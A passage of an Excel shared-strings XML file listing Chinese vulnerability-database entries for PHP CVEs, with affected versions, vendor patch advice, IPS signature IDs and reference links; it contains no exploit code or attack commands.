    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=6739</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-400
http://php.net/ChangeLog-5.php
https://bugs.php.net/bug.php?id=67329</t>
  </si>
  <si>
    <t>PHP‘bzread()’代码执行漏洞(CVE-2016-5399)</t>
  </si>
  <si>
    <t>影响PHP:5.5.38以下版本,5.6版本(含)到5.6.24版本,7.0版本(含)到7.0.9版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=72613</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-956</t>
  </si>
  <si>
    <t>PHP表单文件上传路径注入漏洞</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://svn.php.net/viewvc?view=revision&amp;revision=312103</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201106-163
https://exchange.xforce.ibmcloud.com/vulnerabilities/67999</t>
  </si>
  <si>
    <t>PHP IMAP扩展imap_do_open函数双重释放漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.2.0版本(含)到5.2.15版本,5.3.0版本(含)到5.3.4版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201012-091
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP多个空指针引用拒绝服务漏洞（CVE-2011-3182）</t>
  </si>
  <si>
    <t>ips-11020089（有效）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201108-451</t>
  </si>
  <si>
    <t>PHP资源管理错误漏洞</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201108-453
https://exchange.xforce.ibmcloud.com/vulnerabilities/69428</t>
  </si>
  <si>
    <t>PHP 'php_zip.c' 目录遍历漏洞（CVE-2014-9767）</t>
  </si>
  <si>
    <t>影响PHP:5.5.54以下版本,5.5.0版本(含)到5.5.29版本,5.6.0版本(含)到5.6.13版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201604-385
http://php.net/ChangeLog-7.php#7.0.0</t>
  </si>
  <si>
    <t>PHP ext/session/session.c对象注入漏洞(CVE-2016-7125)</t>
  </si>
  <si>
    <t>影响PHP:5.6.25以下版本,7.0.0版本(含)到7.0.10版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=95433e8e339dbb6b5d5541473c1661db6ba2c451</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-079
https://bugs.php.net/bug.php?id=72697</t>
  </si>
  <si>
    <t>PHP “shmop_read()”远程整数溢出漏洞</t>
  </si>
  <si>
    <t>ips-11020093（有效）</t>
  </si>
  <si>
    <t>PHP PDORow对象远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>ips-11020081（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.3.9版本</t>
  </si>
  <si>
    <t>厂商补丁： PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.php.net</t>
  </si>
  <si>
    <t>PHP 'open_basedir'安全限制绕过漏洞(CVE-2012-3365)</t>
  </si>
  <si>
    <t>影响PHP:5.3.14以下版本(含)</t>
  </si>
  <si>
    <t>厂商补丁：PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net</t>
  </si>
  <si>
    <t>PHP PCNTL扩展拒绝服务漏洞(CVE-2011-0753)</t>
  </si>
  <si>
    <t xml:space="preserve">建议升级PHP产品至最新版本，请到厂商的主页下载：http://www.php.net/http://bugs.php.net/52784 </t>
  </si>
  <si>
    <t>http://bugs.php.net/52784www.php.net
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP Standard PHP Library扩展SplFileInfo::getType函数后置链接漏洞(CVE-2011-0754)</t>
  </si>
  <si>
    <t>建议升级PHP产品至最新版本，请到厂商的主页下载： http://www.php.net/http://bugs.php.net/51763</t>
  </si>
  <si>
    <t>www.php.net
http://www.php.net/ChangeLog-5.php
http://bugs.php.net/51763
https://exchange.xforce.ibmcloud.com/vulnerabilities/65429</t>
  </si>
  <si>
    <t>PHP mt_rand函数整数溢出漏洞(CVE-2011-0755)</t>
  </si>
  <si>
    <t>建议升级PHP产品至最新版本，请到厂商的主页下载：http://www.php.net/ http://bugs.php.net/46587</t>
  </si>
  <si>
    <t>www.php.net
http://www.php.net/ChangeLog-5.php
http://bugs.php.net/46587</t>
  </si>
  <si>
    <t>PHP ‘sapi/cgi/cgi_main.c’ SQL注入漏洞(CVE-2012-2336)</t>
  </si>
  <si>
    <t>影响PHP:5.3.12以下版本(含),5.4.0版本(含)到5.4.2版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：         http://www.php.net/archive/2012.php#id2012-05-08-1</t>
  </si>
  <si>
    <t>PHP set_magic_quotes_runtime函数SQL注入漏洞(CVE-2010-4700)</t>
  </si>
  <si>
    <t>影响PHP:5.3.2版本(含)到5.3.3版本(含)</t>
  </si>
  <si>
    <t>建议升级PHP产品至最新版本，请到厂商的主页下载：http://www.php.net/http://bugs.php.net/52221</t>
  </si>
  <si>
    <t>www.php.nethttp://www.php.net/ChangeLog-5.phphttp://bugs.php.net/52221
https://exchange.xforce.ibmcloud.com/vulnerabilities/64964</t>
  </si>
  <si>
    <t>PHP \Unserialize()\函数释放后重利用远程代码执行漏洞（CVE-2014-8142）</t>
  </si>
  <si>
    <t>ips-11021986, ips-11024098（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.4.36以下版本,5.5.0版本(含)到5.5.20版本,5.6.0版本(含)到5.6.4版本</t>
  </si>
  <si>
    <t>厂商补丁PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.php</t>
  </si>
  <si>
    <t>PHP libmagick 'libmagic/softmagic.c'拒绝服务漏洞（CVE-2015-4604）</t>
  </si>
  <si>
    <t>影响PHP:5.4.40以下版本,5.5.0版本(含)到5.5.24版本,5.6.0版本(含)到5.6.8版本</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.phphttp://git.php.net/?p=php-src.git;a=commitdiff;h=f938112c495b0d26572435c0be73ac0bfe642ecd</t>
  </si>
  <si>
    <t>PHP Phar::convertToData远程拒绝服务漏洞（CVE-2015-5589）</t>
  </si>
  <si>
    <t>影响PHP:5.4.43以下版本,5.5.1版本(含)到5.5.27版本,5.6.0版本(含)到5.6.11版本</t>
  </si>
  <si>
    <t>厂商补丁：PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.phphttp://git.php.net/?p=php-src.git;a=commit;h=bf58162ddf970f63502837f366930e44d6a992cf</t>
  </si>
  <si>
    <t>PHP PharData类目录遍历漏洞(CVE-2015-6833)</t>
  </si>
  <si>
    <t>影响PHP:5.4.44以下版本,5.5.0版本(含)到5.5.28版本,5.6.0版本(含)到5.6.12版本</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://bugs.php.net/bug.php?id=70019http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP‘libxml RSHUTDOWN’函数信息泄露漏洞(CVE-2012-1171)</t>
  </si>
  <si>
    <t>影响PHP:5.0.0版本(含)到5.5.6版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/php/php-src/blob/master/ext/libxml/tests/bug61367-read.phpt</t>
  </si>
  <si>
    <t>https://github.com/php/php-src/blob/master/ext/libxml/tests/bug61367-write.phpthttps://github.com/php/php-src/blob/master/ext/libxml/tests/bug61367-read.phpthttps://bugzilla.redhat.com/show_bug.cgi?id=802591
https://github.com/php/php-src/blob/master/ext/libxml/tests/bug61367-write.phpthttps://github.com/php/php-src/blob/master/ext/libxml/tests/bug61367-read.phpthttps://bugzilla.redhat.com/show_bug.cgi?id=802591
https://bugs.php.net/bug.php?id=61367
https://github.com/php/php-src/commit/167e2fd78224887144496cdec2089cd5b2f3312d</t>
  </si>
  <si>
    <t>PHP Calendar扩展数字错误漏洞(CVE-2015-1353)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接： http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>https://www.php.net/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1353
https://www.cnvd.org.cn/flaw/show/CNVD-2015-02111</t>
  </si>
  <si>
    <t>PHP 'ext/soap/php_xml.c'不完整修复多个任意文件泄露漏洞(CVE-2013-1824)</t>
  </si>
  <si>
    <t>影响PHP:5.3版本(含)到5.3.21版本(含),5.4.0版本(含)到5.4.11版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=12fe4e90be7bfa2a763197079f68f5568a14e071</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201309-217
https://github.com/php/php-src/commit/188c196d4da60bdde9190d2fc532650d17f7af2d
https://github.com/php/php-src/commit/cc4c318b0c71e1a9c9cf803b5ee5d437344d64db
http://www.php.net/ChangeLog-5.php#5.4.12</t>
  </si>
  <si>
    <t>PHP mb_strcut函数输入验证漏洞(CVE-2010-4156)</t>
  </si>
  <si>
    <t>影响PHP:5.3版本(含)到5.3.3版本(含),5.4版本(含)到5.4.12版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=68283</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201011-130
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP wddx.c释放后重利用漏洞(CVE-2016-3141)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://secure.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201603-444
https://bugs.php.net/bug.php?id=71587</t>
  </si>
  <si>
    <t>PHP GD组件拒绝服务漏洞(CVE-2015-8874)</t>
  </si>
  <si>
    <t>影响PHP:5.6.11以下版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-402
https://bugs.php.net/bug.php?id=66387
http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP ext/phar/phar_object.c拒绝服务漏洞(CVE-2016-4342)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=4c2424eb24b0178456acc404dbfff528cdc44197</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201604-627</t>
  </si>
  <si>
    <t>PHP exif_process_IFD_in_JPEG拒绝服务漏洞(CVE-2016-4543)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=13ad4d3e971807f9a58ab5933182907dc2958539</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-156
https://bugs.php.net/bug.php?id=72094</t>
  </si>
  <si>
    <t>PHP grapheme_stripos拒绝服务漏洞(CVE-2016-4540)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://git.php.net/?p=php-src.git;a=commit;h=fd9689745c44341b1bd6af4756f324be8abba2fb</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-153
https://bugs.php.net/bug.php?id=72061</t>
  </si>
  <si>
    <t>PHP exif_process_user_comment拒绝服务漏洞(CVE-2016-6292)</t>
  </si>
  <si>
    <t>ips-11020702（有效）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-930</t>
  </si>
  <si>
    <t>PHP 安全漏洞（CVE-2012-2143）</t>
  </si>
  <si>
    <t>影响PHP:5.3.0版本(含)到5.3.14版本,5.4.0版本(含)到5.4.4版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201205-549</t>
  </si>
  <si>
    <t>PHP 安全漏洞</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201505-042
https://bugs.php.net/bug.php?id=69218</t>
  </si>
  <si>
    <t>PHP Exif Extension \exif_read_data()\函数远程拒绝服务漏洞</t>
  </si>
  <si>
    <t>ips-11020079, ips-11020080（有效）</t>
  </si>
  <si>
    <t>PHP \_zip_name_locate()\空指针引用拒绝服务漏洞</t>
  </si>
  <si>
    <t>PHP Calendar Extension “SdnToJulian()”远程整数溢出漏洞</t>
  </si>
  <si>
    <t>PHP 5.3.9之前版本strtotime函数调用远程拒绝访问漏洞</t>
  </si>
  <si>
    <t>ips-11020082（有效）</t>
  </si>
  <si>
    <t>PHP Zend引擎释放后重用堆破坏漏洞(CVE-2010-4697)</t>
  </si>
  <si>
    <t>影响PHP:5.2.15以下版本,5.3.0版本(含)到5.3.4版本</t>
  </si>
  <si>
    <t>http://www.php.net
https://exchange.xforce.ibmcloud.com/vulnerabilities/65310</t>
  </si>
  <si>
    <t>PHP 'header()' HTTP标头注入漏洞(CVE-2011-1398)</t>
  </si>
  <si>
    <t>ips-11020242（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.3版本(含)到5.3.11版本(含),5.4.0RC2版本</t>
  </si>
  <si>
    <t>PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net</t>
  </si>
  <si>
    <t>PHP Fileinfo组件file 安全漏洞(CVE-2015-8865)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：         http://git.php.net/?p=php-src.git;a=commit;h=fe13566c93f118a15a96320a546c7878fd0cfc5e</t>
  </si>
  <si>
    <t>PHP "/imap/php_imap.c"释放后重利用远程代码执行漏洞(CVE-2010-4510)</t>
  </si>
  <si>
    <t>参见《PHP __imap_php_imap.c_释放后重利用远程代码执行漏洞(CVE-2010-4510)-修复方案》</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4510</t>
  </si>
  <si>
    <t>PHP 多个本地缓冲区溢出漏洞(CVE-2007-1411)</t>
  </si>
  <si>
    <t>影响PHP:4.4.5以下版本(含),5.2.2版本(含)到5.4.0版本(含)</t>
  </si>
  <si>
    <t>参见《PHP 多个本地缓冲区溢出漏洞(CVE-2007-1411)-修复方案》</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200703-302
https://cxsecurity.com/cveshow/CVE-2007-1411</t>
  </si>
  <si>
    <t>PHP __toString()函数类型混淆信息泄露漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.3.0版本(含)到5.3.29版本(含),5.4.1版本(含)到5.4.40版本,5.5.0版本(含)到5.5.24版本,5.6.0版本(含)到5.6.8版本</t>
  </si>
  <si>
    <t>参见《PHP __toString()函数类型混淆信息泄露漏洞-修复方案》</t>
  </si>
  <si>
    <t>PHP '__toString()'函数 信息泄露漏洞</t>
  </si>
  <si>
    <t>参见《PHP ___toString()_函数 信息泄露漏洞-修复方案》</t>
  </si>
  <si>
    <t>PHP SSL Certificate Validation 安全绕过漏洞（CVE-2013-4248）</t>
  </si>
  <si>
    <t>ips-11024369, ips-11024370, ips-11024371, ips-11024372, ips-11024373, ips-11024374（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.0版本(含)到5.4.17版本(含),5.5版本(含)到5.5.1版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201308-244</t>
  </si>
  <si>
    <t>PHP 'cdf_unpack_summary_info()'函数拒绝服务漏洞（CVE-2014-0237）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201406-001</t>
  </si>
  <si>
    <t>PHP exif_thumbnail() 函数堆缓冲区溢出漏洞(CVE-2014-3670)</t>
  </si>
  <si>
    <t>ips-11021950, ips-11024099（有效）</t>
  </si>
  <si>
    <t>PHP&lt;5.4.34</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=68113
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_15663&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP spl_dllist.c 本地拒绝服务漏洞(CVE-2014-4670)</t>
  </si>
  <si>
    <t>PHP≤5.5.14</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://www.php.net/</t>
  </si>
  <si>
    <t>https://support.apple.com/HT204659
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_25952&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP Fileinfo组件输入验证漏洞(CVE-2014-3480)</t>
  </si>
  <si>
    <t>PHP ≤5.4.295.5≤PHP&lt;5.5.14</t>
  </si>
  <si>
    <t>http://www.php.net/ChangeLog-5.php
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_15688&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP Fileinfo组件file 缓冲区溢出漏洞(CVE-2014-9652)</t>
  </si>
  <si>
    <t>PHP≤5.4.365.5.0≤PHP&lt;5.5.215.6.0≤PHP&lt;5.6.5</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-5.php
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_26043&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP CGI Web服务器httpoxy安全漏洞(CVE-2016-4650)</t>
  </si>
  <si>
    <t>影响php:5.5.35以下版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已经发布了升级补丁以修复此安全问题，详情请关注厂商主页：http://php.net/</t>
  </si>
  <si>
    <t>http://www.kb.cert.org/vuls/id/797896
https://bugzilla.redhat.com/show_bug.cgi?id=1353794
https://httpoxy.org/</t>
  </si>
  <si>
    <t>PHP5 安全漏洞(CVE-2010-4657)</t>
  </si>
  <si>
    <t>影响PHP:5.0.0版本(含)到5.4.4版本</t>
  </si>
  <si>
    <t>厂商补丁:</t>
  </si>
  <si>
    <t>PHP ‘QUERY_STRING’ 参数安全漏洞</t>
  </si>
  <si>
    <t>影响PHP:5.3.12以下版本(含),5.4.0版本(含)到5.4.1版本(含)</t>
  </si>
  <si>
    <t>建议升级PHP产品至最新版本，请到厂商的主页下载：http://www.php.net/</t>
  </si>
  <si>
    <t>http://www.php.net/
http://www.php.net/archive/2012.php#id2012-05-08-1
http://secunia.com/advisories/49014</t>
  </si>
  <si>
    <t>PHP sqlite_udf_decode_binary()函数缓冲区溢出漏洞(CVE-2007-1888)</t>
  </si>
  <si>
    <t>影响PHP:4.0.0版本(含)到5.4.0版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：         http://www.php.net</t>
  </si>
  <si>
    <t>http://www.php-security.org/MOPB/MOPB-41-2007.html
http://www.ubuntu.com/usn/usn-455-1
http://www.sqlite.org/cvstrac/rlog?f=sqlite/src/encode.c
https://exchange.xforce.ibmcloud.com/vulnerabilities/38518
http://secunia.com/advisories/25057</t>
  </si>
  <si>
    <t>PHP栈缓冲区溢出漏洞(CVE-2010-4698)</t>
  </si>
  <si>
    <t>影响PHP:5.2版本(含)到5.2.15版本,5.3.0版本(含)到5.3.4版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接： http://windows.php.net/qa/</t>
  </si>
  <si>
    <t>www.php.net
http://www.php.net/ChangeLog-5.php
http://bugs.php.net/53492</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2015-8876)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：         http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP FPM 'php-fpm.conf.in'本地权限提升漏洞(CVE-2014-0185)</t>
  </si>
  <si>
    <t>影响PHP:5.4.28以下版本,5.5.0版本(含)到5.5.12版本</t>
  </si>
  <si>
    <t>厂商补丁The PHP Group---目前厂商已经发布了PHP的最新版本以修复这个安全问题，请到厂商的官方页面下载最新版本: 链接：http://php.net/downloads.php</t>
  </si>
  <si>
    <t>PHP空指针多个安全限制绕过漏洞（CVE-2015-3411）</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.phphttp://git.php.net/?p=php-src.git;a=commitdiff;h=52b93f0cfd3cba7ff98cc5198df6ca4f23865f80</t>
  </si>
  <si>
    <t>PHP 'exception::getTraceAsString'远程安全漏洞（CVE-2015-4603）</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.phphttp://git.php.net/?p=php-src.git;a=commitdiff;h=a894a8155fab068d68a04bf181dbaddfa01ccbb0</t>
  </si>
  <si>
    <t>PHP空指针多个安全限制绕过漏洞（CVE-2015-3412）</t>
  </si>
  <si>
    <t>PHP libmagick 'libmagic/softmagic.c'拒绝服务漏洞（CVE-2015-4605）</t>
  </si>
  <si>
    <t>PHP多个内存破坏漏洞（CVE-2015-4599）</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.phphttp://git.php.net/?p=php-src.git;a=commitdiff;h=0c136a2abd49298b66acb0cad504f0f972f5bfe8http://git.php.net/?p=php-src.git;a=commitdiff;h=51856a76f87ecb24fe1385342be43610fb6c86e4http://git.php.net/?p=php-src.git;a=commitdiff;h=fb83c76deec58f1fab17c350f04c9f042e5977d1</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2015-4600)</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=69152http://git.php.net/?p=php-src.git;a=commit;h=0c136a2abd49298b66acb0cad504f0f972f5bfe8http://php.net/ChangeLog-5.php
https://bugs.php.net/bug.php?id=69152http://git.php.net/?p=php-src.git;a=commit;h=0c136a2abd49298b66acb0cad504f0f972f5bfe8http://php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP make_http_soap_request拒绝服务漏洞(CVE-2015-8835)</t>
  </si>
  <si>
    <t>影响PHP:5.4.43以下版本(含),5.5.0版本(含)到5.5.27版本(含),5.6.0版本(含)到5.6.11版本(含)</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=70081http://php.net/ChangeLog-5.phphttp://www.ubuntu.com/usn/usn-2952-1/
https://bugs.php.net/bug.php?id=70081http://php.net/ChangeLog-5.phphttp://www.ubuntu.com/usn/usn-2952-1/</t>
  </si>
  <si>
    <t>PHP 'libxml_disable_entity_loader()' 安全漏洞(CVE-2015-8866)</t>
  </si>
  <si>
    <t>影响PHP:5.5.22以下版本,5.6.0版本(含)到5.6.6版本</t>
  </si>
  <si>
    <t>厂商补丁:PHP---目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：URL:http://www.openwall.com/lists/oss-security/2016/04/24/1http://git.php.net/?p=php-src.git;a=commit;h=de31324c221c1791b26350ba106cc26bad23ace9http://www.php.net/ChangeLog-5.phphttps://bugs.launchpad.net/ubuntu/+source/php5/+bug/1509817https://bugs.php.net/bug.php?id=64938</t>
  </si>
  <si>
    <t>PHP  unserialize()函数类型混淆安全漏洞(CVE-2014-3515)</t>
  </si>
  <si>
    <t>ips-11020725, ips-11020726, ips-11020727（有效）</t>
  </si>
  <si>
    <t>5.3.0≤PHP≤5.3.285.4.0≤PHP≤5.4.295.5.0≤PHP≤5.5.13</t>
  </si>
  <si>
    <t>https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2019_11121&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP libxmlrpc/xmlrpc.c缓冲区溢出漏洞(CVE-2014-3668)</t>
  </si>
  <si>
    <t>PHP≤5.4.335.5.0≤PHP&lt;5.5.185.6.0≤PHP&lt;5.6.2</t>
  </si>
  <si>
    <t>http://php.net/ChangeLog-5.php
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_15635&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP远程代码执行漏洞(CVE-2015-0231)</t>
  </si>
  <si>
    <t>ips-11023696, ips-11024095, ips-11024096, ips-11024097（有效）</t>
  </si>
  <si>
    <t>PHP&lt;5.4.375.5.0&lt;PHP&lt;5.5.215.6.0&lt;PHP&lt;5.6.5</t>
  </si>
  <si>
    <t>https://bugs.php.net/bug.php?id=68710
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_15638&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>PHP Opcache扩展释放后重用漏洞(CVE-2015-1351)</t>
  </si>
  <si>
    <t>影响PHP:5.6.7以下版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-175
https://support.apple.com/HT205267</t>
  </si>
  <si>
    <t>PHP 双重释放内存破坏漏洞（CVE-2016-5772）</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/php/php-src/commit/4cc0286f2f3780abc6084bcdae5dce595daa3c12</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201606-563
https://bugs.php.net/bug.php?id=72340</t>
  </si>
  <si>
    <t>PHP ext/wddx/wddx.c文件安全漏洞(CVE-2016-7132)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-177
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 'cgi_main.c'越界读拒绝服务漏洞(CVE-2014-9427)</t>
  </si>
  <si>
    <t>影响PHP:5.4.36以下版本(含),5.5.0版本(含)到5.5.20版本(含),5.6.0版本(含)到5.6.4版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201501-059
https://bugs.php.net/bug.php?id=68618</t>
  </si>
  <si>
    <t>PHP “Intl”扩展“NumberFormatter::setSymbol()”函数拒绝服务漏洞</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://bugs.php.net/bug.php?id=68618</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201103-261
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP phar_parse_tarfile()整数溢出漏洞(CVE-2012-2386)</t>
  </si>
  <si>
    <t>ips-11020761（有效）</t>
  </si>
  <si>
    <t>影响PHP:5.3版本(含)到5.3.13版本(含),5.4.0版本(含)到5.4.3版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201206-053</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2016-4071)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201604-558
http://www.php.net/ChangeLog-5.php</t>
  </si>
  <si>
    <t>PHP 安全漏洞(CVE-2016-5093)</t>
  </si>
  <si>
    <t>影响PHP:5.5.36以下版本,5.6版本(含)到5.6.22版本,7.0版本(含)到7.0.7版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：http://www.php.net/downloads.php</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-657
http://php.net/ChangeLog-7.php</t>
  </si>
  <si>
    <t>PHP 拒绝服务漏洞(CVE-2013-7456)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201605-656
http://php.net/ChangeLog-7.php#7.0.7</t>
  </si>
  <si>
    <t>PHP‘wddx_deserialize()’拒绝服务漏洞(CVE-2016-7129)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://git.php.net/?p=php-src.git;a=commit;h=16023f3e3b9c06cf677c3c980e8d574e4c162827</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201609-073
https://bugs.php.net/bug.php?id=72749</t>
  </si>
  <si>
    <t>PHP 缓冲区溢出漏洞(CVE-2014-3597)</t>
  </si>
  <si>
    <t>PHP &lt;5.4.32PHP &lt;5.5.16</t>
